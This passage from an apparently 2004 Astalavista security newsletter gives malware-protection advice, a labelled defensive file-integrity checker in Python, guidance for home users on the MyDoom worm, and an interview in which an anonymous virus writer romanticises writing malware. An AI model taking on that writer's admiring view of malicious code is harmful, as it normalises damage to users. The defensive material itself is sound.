- Turn off the Preview and/or HTML mail options in the e-mail client program.
- Do not open Microsoft Office documents from unknown sources without first disabling macros.
- Be careful about using diskettes that have been used in other computers.
- Install and use firewall software.
- Install antivirus software, configure it to run scans automatically at predefined times, and update the definition files regularly.
- Use intrusion prevention tools called behavior blockers, which deny programs the ability to execute operations that have not been explicitly permitted.
- Use behavior detection solutions such as Finjan's SurfinGate and SurfinShield, which use investigative techniques to analyze executable files and assess whether they are likely to be hostile. http://www.finjan.com/products/surfingate.cfm
- Use integrity checker software (such as Tripwire) to scan the system for changes.

Recognizing the presence of malicious code is the first response step if a system gets infected. Administrators and users need to be on the alert for common indications that a virus might be present, such as the following:

  - Missing files or programs
  - Unexplained changes to the system's configuration
  - Unexpected and unexplained displays, messages, or sounds
  - New files or programs that suddenly appear with no explanation
  - Memory "leaks" (less available system memory than normal)
  - Unexplained use of disk space
  - Any other odd or unexplained behavior of programs or the operating system

If a virus is suspected, a good antivirus program should be installed and run to scan the system for viruses and attempt to remove or quarantine any that are found. Finally, all mission-critical or irreplaceable data should be backed up on a regular basis in case all these measures fail.
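The integrity checker tip and the "new files that suddenly appear" indicator above are the same idea from two sides: you can only notice what appeared or changed if you recorded what was there before. The following is an added example (not code from the newsletter and not Tripwire's own) of the minimal Tripwire-style check: hash every file under a directory into a baseline, then diff a later scan against it. The demo builds a throw-away web root in a temporary directory, takes a baseline, then simulates the kind of noise the Nimda description mentions (a readme.eml and a .nws copy dropped, an .htm page rewritten); the file names in the demo other than readme.eml are constructed, and no real malware is involved.

```python
"""Minimal Tripwire-style file integrity check (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map relative path -> {sha256, size} for every regular file under root."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": hash_file(p),
                "size": p.stat().st_size,
            }
    return baseline


def save_baseline(baseline: dict, dest: Path) -> None:
    # Keep the baseline off the monitored tree (ideally on read-only media):
    # a baseline the malware can rewrite proves nothing.
    dest.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(baseline: dict, current: dict) -> dict:
    """Return sorted lists of added, removed and modified relative paths."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(
            p for p in old & new if baseline[p]["sha256"] != current[p]["sha256"]
        ),
    }


def demo() -> dict:
    """Constructed scenario: baseline a tiny site, simulate an infection, diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wwwroot"
        (root / "docs").mkdir(parents=True)
        (root / "index.htm").write_text("<html><body>hello</body></html>")
        (root / "docs" / "report.doc").write_bytes(b"\xd0\xcf\x11\xe0 fake doc")
        baseline_file = Path(tmp) / "baseline.json"  # outside wwwroot
        save_baseline(build_baseline(root), baseline_file)

        # Simulated worm activity: copies dropped as .eml/.nws files and a
        # page rewritten to carry a loader (placeholder text, not a real one).
        (root / "readme.eml").write_bytes(b"MIME-Version: 1.0 ...")
        (root / "docs" / "sample.nws").write_bytes(b"MIME-Version: 1.0 ...")
        with (root / "index.htm").open("a") as fh:
            fh.write("<script>/* loader appended by worm */</script>")

        return compare(load_baseline(baseline_file), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run the baseline step right after a clean install or patch, before the box goes on the network, and re-run the compare step on a schedule; a sudden crop of .eml/.nws files or a changed page on an IIS box is exactly the signal the section above says made compromised Nimda servers easy to spot.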
Virus writers are a creative and persistent bunch and will continue to come up with new ways to do the "impossible," so computer users should never assume that any particular file type or OS is immune to malicious code. The only sure way to protect against viruses is to power down the computer and leave it turned off :-)

Information about specific viruses and instructions on how to clean an infected system are available at www.symantec.com and www.mcafee.com. Both antivirus vendors provide detailed databases that list and describe known viruses. I also recommend keeping an eye on http://www.securitynewsportal.com/ (one of my favourites), where you will get hourly updates on the latest security, hacking, virus and trojan news. And, of course, http://astalavista.net/ !

07. Home Users Security Issues
--------------------------

Due to the high number of e-mails we keep getting from novice users, we have decided that it would be a very good idea to give them a section of their own, discussing various aspects of Information Security in an easy to understand way while improving their current level of knowledge. If you have questions or recommendations for the section, direct them to security@astalavista.net

Enjoy yourself!

- Malicious Code (Malware) - How To Protect Myself -

The recent appearance of the MyDoom worm, and its attacks on SCO's web site (http://sco.com), has again opened the discussion on end users' education and awareness of malicious software. Basically, worms like MyDoom target home users rather than corporate ones, but why?
The worm's aim in this case is to infect as many home users as possible, then use their connections' bandwidth to launch an attack on SCO's web site, simultaneously and in coordination across all the victims. Don't get me wrong, a lot of Fortune 500 companies have problems with the worm as well, because it spreads via .zip attachments, which are commonly used in the corporate environment for both sending and receiving large attachments. But who do you think has the greater chance of infection: the corporate end user protected by the company's gateway content filtering and anti-virus software, or the home user who sometimes doesn't even have a reliable firewall installed on his/her computer? Corporate users, of course, got infected as well; insecure laptop maintenance, personal correspondence through the corporate e-mail and many other factors contributed to the aforesaid problems at Fortune 500 companies.

- How powerful are worms? -

Worm networks are one of the most powerful DDoS (Distributed Denial of Service) attack tools, creating a network of thousands of "participants" who contribute their bandwidth, which in most cases comes from an "always-on" connection. Simultaneously attacking a given target with a network of literally thousands of infected computers will allow the attacker to shut down any site worldwide. The I LOVE YOU worm is believed to have caused billions of dollars in damage worldwide; in the above-mentioned article "Known Malware Exploits Explained" you can read more about the most famous and destructive worms released so far.

- How can I get infected? -

The majority of Internet worms targeting end users spread via e-mail and IRC, while those targeting companies' networks and servers spread via IP scanning, file shares and auto-exploiting a known (or unknown) vulnerability.
Due to its nature, e-mail is the most commonly used method of spreading in the wild. Here we'll discuss several scenarios:

- Using outdated software

One of the worst scenarios is running outdated software, namely software that has at least one publicly known vulnerability. When that software happens to be the browser or the e-mail client you're using, it's just a matter of time before someone exploits the vulnerability, which in most cases amounts to auto-execution of a file sent to your e-mail, just by viewing the message. Check your vendor's web site at least once a week for the latest vulnerabilities. Sometimes a vulnerability is known to the public while the vendor cannot respond with a patch as soon as it is expected to.

- Lack of awareness

There's still a large number of home users who don't make a distinction between a virus, a trojan and a worm; they are unaware of the sender's real intentions and of the worldwide epidemic they become part of just by executing the attachment sent to their mailboxes. Realize the consequences of your actions, both for your home computer and for the millions of Internet users worldwide; it's everyone's responsibility.

- Lack of anti-virus software and a stable firewall

Although anti-virus scanners cannot guarantee 100% protection against viruses, trojans and worms, they're a "must have", because they eliminate a large number of known dangerous programs; some malware specifically targets users who don't even have an anti-virus scanner. Getting infected by the latest fast-spreading worm is one thing, but getting infected by malware that has been in the product's signature database for the past half year is another story. Something else to consider is that an anti-virus scanner that is not regularly updated (on a weekly basis) will only give you a false sense of security.
Having a decent firewall will also increase your protection, but bear in mind that the firewall should be properly configured. There are certain firewalls that configure themselves automatically and are designed for novice Internet users; these will work OK, as long as you don't let malware make a connection to the outside world (the Internet). A list of various Windows based firewalls can be found here: http://www.firewallguide.com/software.htm

A paper entitled The Complete Windows Trojans Paper (http://www.astalavista.com/media/files/comp_trojans.txt) fully discusses the various ways in which you can get infected by either a trojan or a worm.

- How can I protect myself? -

- The logical approach

Ask yourself: how come I am receiving an e-mail from someone I don't know that contains nothing but junk characters and an attachment with a strange extension? How come I am receiving an e-mail from John, my colleague in the Chicago branch, that doesn't even include his signature, or at least a personal message, but just an attachment? I'd better mail/call him, lose a few minutes, but verify what is going on; if it's malware, he can immediately contact their Information Security Office for further action. Don't be naive: you won't get rich by forwarding an e-mail, you won't fall in love because of forwarding an e-mail, but you might get yourself and countless other people in trouble. Don't fall victim to your own naivety!

08. Meet the Security Scene
-----------------------

In this section you are going to meet famous people, security experts and all the folks who in some way contribute to the growth of the community. We hope that you will enjoy these interviews and that you will learn a lot of interesting information through this section. In this issue we have interviewed an anonymous malware coder who requested the interview because of the appearance of the MyDoom worm.
He insisted on giving us this interview on the strength of his long-term experience in this field; we, of course, double-checked how experienced he is, and were pretty surprised when we found out more about his worms and so on. In a time when worms spread around the Internet on a daily basis, we believe you're going to enjoy this interview. Something else to consider before mailing us about it: for obvious reasons we don't have his e-mail or any of his contact details. The interview was conducted following the coder's personal views on anonymity.

Your comments are appreciated at security@astalavista.net

------------------------------------------------
Interview with an Anonymous Malwares' Coder

Astalavista: Before we start, I think it would be better if you pick a random name, so I can at least call you something :)

Malwares' Coder: Doesn't bother me, how does Joe sound?

Astalavista: Ok, Joe, what was your primary intention when you e-mailed us requesting this interview?

Joe: Before answering this question, I would like to clarify something - I'm speaking for myself, I don't represent the virii/malware scene in any way; all views and answers are based on my viewpoint. On your question... the MyDoom worm epidemic made me request this talk, and particularly the articles published around the major news portals. I especially don't like the audience there, because it's the audience that makes the portal. Do you actually believe you're going to see "the real story" at a site like these? I wanted to give more publicity to the malware scene, I wanted to talk about how easy it is to launch a trojan and about all these 250k's we keep seeing as rewards on the next worm. Something else: I wanted to get the publicity for this interview through Astalavista.com, as a well-known and one of the most popular sites for security in the world, as by what I know, it's just a myth that the site is visited by novice and warez visitors only.
I personally believe that the site is visited by the major IT security companies in the industry, and also by government visitors from all over the world. Astalavista.com just gives an overview of the "underground" in all of its forms. Enough flattering :-)

Astalavista: Our visitors would really appreciate it if you gave us more info about your background and experience in this field.

Joe: Sure. I've been involved in the virii scene for the past 10 years. By involved, I mean participating in active virii coding groups, attending private cons and local meetings, writing articles on how to code. I'm currently employed by a well known anti-virus vendor - they're aware of my background, so I'm just analyzing malware. During all this time I've been talking about ethics as well.

Astalavista: How come you are a virii writer then? :)

Joe: Honestly, how easy is it to code a virus nowadays? How easy is it to modify a public source code and then turn it into another mutation of the actual virus, and besides all, who do you think is going to do it? Those who don't even have a basic understanding of life and what's left when they play with "toys" like these, with the Internet helping them. I have always tried to restrict lamers from knowledge that is too powerful to be mastered by a bunch of potheads. I have always been "poisoning" source code in order to stop this invasion, because I'm so sick of seeing *.aol.com IPs requesting sources and binaries.

Astalavista: Were you surprised by the MyDoom worm's appearance?

Joe: No, but I was surprised by the worm's early version that the author "released", then waited for a while and released the rest.

Astalavista: You mean that he's "playing with the victim", because it's absolutely sure that the worm will do its dirty work sooner or later?

Joe: Exactly! It could have had a much greater impact, even SCO's partners could have been damaged, so I consider this a warning done in the lamest, yet most powerful and easy to execute way, by a worm.
Astalavista: Do you believe the attacks on SCO's web site by the MyDoom worm are part of the "Linux War" mentioned in a recent article at http://internetnews.com/?

Joe: Everything starts with finding an enemy. Having an enemy means he's powerful enough to get you in trouble, so if it's a part of the "Linux War", then Linux is finally getting the attention it deserves. To me, the decoded "Nothing personal, I'm just doing my job" message sounds like someone's been hired to do something, but while doing it, he/she realises the impact it is going to have, so a personal message is left in the code.

Astalavista: Guilty conscience perhaps, but if so, then I'm sure the "employee" will have a certain % taken out of his payment just because of the clue he/she's giving. And what if someone is orchestrating all this for personal reasons?

Joe: I doubt it's the fired Joe from the financial department; hiring someone else to do this, he would get caught for sure. Or Microsoft's advanced coding fans DDoSing http://kernel.org/ :-) But everything is possible, it might be someone who doesn't have anything better to do, might be someone who's just trying to create more work for the news agencies, or the devastating type of coder.

Astalavista: Let's put it simply, why do malware coders code?

Joe: I think you know the answer better than me - coding is power, seeing how your "baby" makes its first steps is also powerful. Everyone has a reason to do something, or at least they believe they have a reason. For me, the most important point is how many people actually believe they're not going to get caught and keep thinking of ways to avoid that while coding their programs.

Astalavista: And how about all of these 250k rewards, are they going to do any good in tracing the author?
Joe: I still hang out with the people I used to code my first worms with. We have real jobs, like freelance consultants or whatever, that's not the point, it's something else that connects us: it's the intimacy of all these moments when we coded our first "babies", and I doubt they will sell these moments even for 500k. I know what I'm saying, people change, but their history and background never do, with some exceptions, of course. I will tell you something - to me it's just PR that "we" take security seriously enough to offer such a large amount of money as a reward for someone who did damage to our business. But how come they offer 250k, instead of proactively investing these 250k in a disaster recovery plan for a situation like this? And even if someone gets caught because of the 250k reward, who's lame, the caught coder or the company that gives away large amounts of money because it can't use them to properly react in such situations, and no, not by increasing their bandwidth?

Astalavista: What is the best protection against worms?

Joe: If I tell you, I will lose my job :-) Let's put it that way: who opens the e-mail attachments received?

Astalavista: Who do you think made a small fortune out of the MyDoom problem?

Joe: I think it isn't that small, but I am not talking about the financial situation at the moment :-) - the anti-virus vendors, of course. In the first days of the MyDoom worm, even Google did extra "googling" especially for the MyDoom worm. I'm sure they made quite a lot of money with the instant sponsored links placed by the major anti-virus vendors, pointing to their commercial web sites, offering "unique" and free tools to remove the trojan.

Astalavista: Finally, tell us your opinion on the current situation of the IT security industry?
Joe: It's obvious the industry is doing its best to deal with the major security issues today's networks and computers face, but it cannot seem to react properly to the malware one, and more and more "coders" are taking advantage of that. Destruction is, as always, the easiest part.

Astalavista: Thanks for the interview, Joe. We appreciate your opinion!

Joe: Thanks for having me.

09. Security Sites Review
---------------------

The idea of this section is to provide you with reviews of various highly interesting and useful security related web sites. Before we recommend a site, we make sure that it provides its visitors with quality and unique content.

http://www.ccmostwanted.com/
The Most Wanted Cyber Criminals. I'm sure you're all going to enjoy this one; useful articles and daily news updates can be found as well.

http://security-forums.com/
Very friendly and highly popular security forums, where everything related to Security is discussed.

http://www.rootprompt.org/
Security news and papers about Linux security and the Open Source community.

10. Astalavista needs YOU!
---------------------

We are looking for authors who would be interested in writing security related articles for our newsletter, for people's ideas that we will turn into reality with their help, and for anyone who thinks he/she could contribute to Astalavista in any way. Below we have summarized various issues that might concern you.

- Write for Astalavista -

What topics can I write about?

You are encouraged to write on anything related to Security:

General Security
Security Basics
Windows Security
Linux Security
IDS (Intrusion Detection Systems)
Malicious Code
Enterprise Security
Penetration Testing
Wireless Security
Secure programming

What do I get?

Astalavista.com gets more than 200 000 unique visits every day and our Newsletter has more than 22,000 subscribers, so you can imagine what the exposure of your article, and of you, will be. Impressive, isn't it!
We will make your work and you popular among the community!

What are the rules?

Your article has to be UNIQUE and written especially for Astalavista; we are not interested in republishing articles that have already been distributed somewhere else.

Where can I see a sample of a contributed article?

http://www.astalavista.com/media/files/malware.txt

Where and how should I send my article?

Direct your articles to dancho@astalavista.net and include a link to your article; once we take a look at it and decide whether it is qualified enough to be published, we will contact you within several days. Please be patient.

Thanks a lot to all of you, our future contributors!

11. Special Promotions
------------------

- Advanced Security Member Portal - Astalavista.net -

--> Until the end of February <--
$20 off the regular price ($99), so you get a LIFETIME Membership for $79

Astalavista.net is a world-known and highly respected Security Portal offering an enormous database of very well sorted and categorized Information Security resources, files, tools, white papers, e-books etc. At your disposal there are also thousands of working proxies and wargames servers, where all the members try their skills, and most importantly - the daily updates of the portal.

- Over 12,000 members have already subscribed
- Over 3.5 GByte of Security Related data, daily updates and always working links
- Access to thousands of anonymous proxies from all over the world, daily updates
- Security Forums Community where thousands of individuals are ready to share their knowledge and answer your questions; replies are always received, whatever the question asked
- Several WarGames servers waiting to be hacked; information between those interested in this activity is shared through the forums or via personal messages, and a growing archive of white papers containing info on previous hacks of these servers is available as well

http://www.astalavista.net/ The Advanced Security Member Portal

12. Final Words
-----------

We hope you've enjoyed Issue 4 of Astalavista's Security Newsletter. The year 2004 started with the MyDoom worm; let's hope it's not going to end with the Superworm. The topic of this issue was obviously malware; we decided that the Newsletter, being highly popular and read by both home and enterprise users, should provide the two audiences with useful information on how to protect their home and enterprise systems. Don't be naive about anything you receive in your mailbox!

Editor - Dancho Danchev
dancho@astalavista.net

Proofreader - Yordanka Ilieva
danny@astalavista.net